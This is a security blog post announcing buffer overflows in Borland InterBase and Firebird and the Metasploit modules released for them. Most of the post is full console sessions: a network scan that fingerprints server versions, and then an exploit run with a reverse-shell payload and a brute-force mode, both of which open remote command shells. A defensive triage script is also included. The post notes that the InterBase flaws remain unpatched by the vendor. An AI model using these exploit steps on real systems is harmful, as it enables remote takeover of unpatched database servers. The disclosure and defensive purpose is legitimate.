InterBase/Firebird fun
While developing an exploit module for a buffer overflow vulnerability in Borland InterBase published by TippingPoint, we decided to take a quick look at the Borland InterBase code, and unfortunately the results were not good.
We found about 20 buffer overflow vulnerabilities that affect all versions of Borland InterBase, some of which also affect the Firebird relational database. All of them are remote, trivially exploitable, stack-based buffer overflows.
We contacted both Borland/CodeGear and the Firebird developers about these vulnerabilities. After failing to find an email address for reporting security issues in their products, we tried their bug tracking systems. Borland/CodeGear asked us to send the information to their support email address, but we received no further response. The Firebird developers did not answer our reports either, but they did fix these vulnerabilities in the latest version of Firebird.
We published the advisories, exploit modules for some of these vulnerabilities, and an auxiliary scanner module for the Metasploit Framework 3.
The auxiliary scanner module searches an address range for running InterBase/Firebird instances and retrieves the version and implementation of the InterBase server from the InterBase Services Manager. This information can be used to determine the exact target to use in an exploitation scenario.
msf > use auxiliary/scanner/misc/ib_service_mgr_info
msf auxiliary(ib_service_mgr_info) > set RHOSTS 192.168.213.0/24
RHOSTS => 192.168.213.0/24
msf auxiliary(ib_service_mgr_info) > run
[*] Trying 192.168.213.0
[*] Trying 192.168.213.1
[*] Trying 192.168.213.2
...
[*] Trying 192.168.213.132
IP Address: 192.168.213.132
Version of the InterBase server: WI-V6.0.1.0
Implementation of the InterBase server: InterBase/x86/Windows NT
...
[*] Trying 192.168.213.253
[*] Trying 192.168.213.254
[*] Trying 192.168.213.255
[*] Auxiliary module execution completed
msf auxiliary(ib_service_mgr_info) >
Using this information, one can select the exact target in one of our published exploit modules.
msf auxiliary(ib_service_mgr_info) > use windows/misc/ib_isc_attach_database
msf exploit(ib_isc_attach_database) > set RHOST 192.168.213.132
RHOST => 192.168.213.132
msf exploit(ib_isc_attach_database) > set LHOST 192.168.0.4
LHOST => 192.168.0.4
msf exploit(ib_isc_attach_database) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ib_isc_attach_database) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Brute Force
   1   Borland InterBase WI-V8.1.0.257
   2   Borland InterBase WI-V8.0.0.123
   3   Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80
   4   Borland InterBase WI-V7.0.1.1
   5   Borland InterBase WI-V6.5.0.28
   6   Borland InterBase WI-V6.0.1.6
   7   Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0
   8   Borland InterBase WI-V5.5.0.742
   9   Borland InterBase WI-V5.1.1.680
   10  Debug

msf exploit(ib_isc_attach_database) > set TARGET 7
TARGET => 7
msf exploit(ib_isc_attach_database) > exploit
[*] Started reverse handler
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:33891)

Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
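From the defender's side, the same scanner output is an inventory: parsing it and mapping each host's reported version onto the target table above shows which hosts a ready-made public exploit applies to. The following is an added example, not code from the original post or from the Metasploit modules; the sample output is constructed, and the "Firebird/" implementation prefix used to tell Firebird from InterBase is an assumption.

```python
TARGETS = {  # version strings per target id, from the module's `show targets` listing
    1: ["WI-V8.1.0.257"], 2: ["WI-V8.0.0.123"],
    3: ["WI-V7.5.0.129", "WI-V7.5.1.80"], 4: ["WI-V7.0.1.1"],
    5: ["WI-V6.5.0.28"], 6: ["WI-V6.0.1.6"],
    7: ["WI-V6.0.0.627", "WI-V6.0.1.0", "WI-O6.0.1.6", "WI-O6.0.2.0"],
    8: ["WI-V5.5.0.742"], 9: ["WI-V5.1.1.680"],
}
VERSION_TO_TARGET = {v: tid for tid, vs in TARGETS.items() for v in vs}

def parse_scan(output):
    """Collect (ip, version, impl) records from ib_service_mgr_info output."""
    hosts, cur = [], {}
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("IP Address:"):
            cur = {"ip": line.split(":", 1)[1].strip()}
        elif line.startswith("Version of the InterBase server:"):
            cur["version"] = line.split(":", 1)[1].strip()
        elif line.startswith("Implementation of the InterBase server:"):
            cur["impl"] = line.split(":", 1)[1].strip()
            hosts.append(cur)  # implementation is the last field of a record
    return hosts

def triage(hosts):
    """Flag hosts whose exact version has a ready-made target in the public module."""
    result = []
    for h in hosts:
        # Assumption: a Firebird server reports an implementation starting "Firebird/".
        firebird = h["impl"].lower().startswith("firebird")
        result.append({
            "ip": h["ip"],
            "product": "Firebird" if firebird else "InterBase",
            "public_exploit_target": VERSION_TO_TARGET.get(h["version"]),
            "action": "upgrade to latest Firebird" if firebird else "no vendor fix: restrict access",
        })
    return result

# Constructed sample in the scanner's output format (not a real scan).
SAMPLE = """\
IP Address: 192.168.213.132
Version of the InterBase server: WI-V6.0.1.0
Implementation of the InterBase server: InterBase/x86/Windows NT
IP Address: 192.168.213.140
Version of the InterBase server: LI-V2.0.1.12855 Firebird 2.0
Implementation of the InterBase server: Firebird/linux AMD64
"""

if __name__ == "__main__":
    for rec in triage(parse_scan(SAMPLE)):
        print(rec)
```

A host whose version string is not in the table is still affected if it runs InterBase; the table only tells you where an off-the-shelf target exists.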
The brute force option assumes that ibguard/fbguard is running, so that the server is restarted after each failed attempt, and tries every available target of the exploit module in sequence.
msf exploit(ib_isc_attach_database) > set TARGET 0
TARGET => 0
msf exploit(ib_isc_attach_database) > exploit
[*] Started reverse handler
[*] Brute forcing with 10 possible targets
[*] Trying target Borland InterBase WI-V8.1.0.257...
[*] Trying target Borland InterBase WI-V8.0.0.123...
[*] Trying target Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80...
[*] Trying target Borland InterBase WI-V7.0.1.1...
[*] Trying target Borland InterBase WI-V6.5.0.28...
[*] Trying target Borland InterBase WI-V6.0.1.6...
[*] Trying target Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0...
[*] Command shell session 2 opened (192.168.0.4:4444 -> 192.168.0.4:33942)

Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
It is important to note that none of the Borland InterBase vulnerabilities we published have been corrected by the vendor; they are present in all versions of the product, including the latest.